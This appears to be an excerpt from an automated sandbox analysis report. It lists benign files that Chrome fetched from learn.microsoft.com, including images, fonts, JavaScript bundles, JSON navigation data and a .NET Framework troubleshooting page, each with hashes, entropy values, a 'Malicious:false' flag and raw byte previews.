                                                                                                                                                                        Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1173007
                                                                                                                                                                        Entropy (8bit):5.503893944397598
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                        MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                        SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                        SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                        SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1817143
                                                                                                                                                                        Entropy (8bit):5.501007973622959
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                        MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                        SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                        SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                        SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1432
                                                                                                                                                                        Entropy (8bit):4.986131881931089
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                        MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                        SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                        SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                        SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):1154
                                                                                                                                                                        Entropy (8bit):4.59126408969148
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                        MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                        SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                        SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                        SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                        Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):19696
                                                                                                                                                                        Entropy (8bit):7.9898910353479335
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                        MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                        SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                        SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                        SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                        Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):33148
                                                                                                                                                                        Entropy (8bit):4.917595394577667
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                        MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                        SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                        SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                        SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                        Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):35005
                                                                                                                                                                        Entropy (8bit):7.980061050467981
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                        MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                        SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                        SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                        SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):13842
                                                                                                                                                                        Entropy (8bit):7.802399161550213
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                        MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                        SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                        SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                        SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):4897
                                                                                                                                                                        Entropy (8bit):4.8007377074457604
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                        MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                        SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                        SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                        SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):47062
                                                                                                                                                                        Entropy (8bit):5.016115705165622
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                        MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                        SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                        SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                        SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                        Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):3130
                                                                                                                                                                        Entropy (8bit):4.790069981348324
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                        MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                        SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                        SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                        SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                        Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):18367
                                                                                                                                                                        Entropy (8bit):7.7772261735974215
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                        MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                        SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                        SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                        SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):13339
                                                                                                                                                                        Entropy (8bit):7.683569563478597
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                        MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                        SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                        SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                        SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):18367
                                                                                                                                                                        Entropy (8bit):7.7772261735974215
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                        MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                        SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                        SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                        SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                        Malicious:false
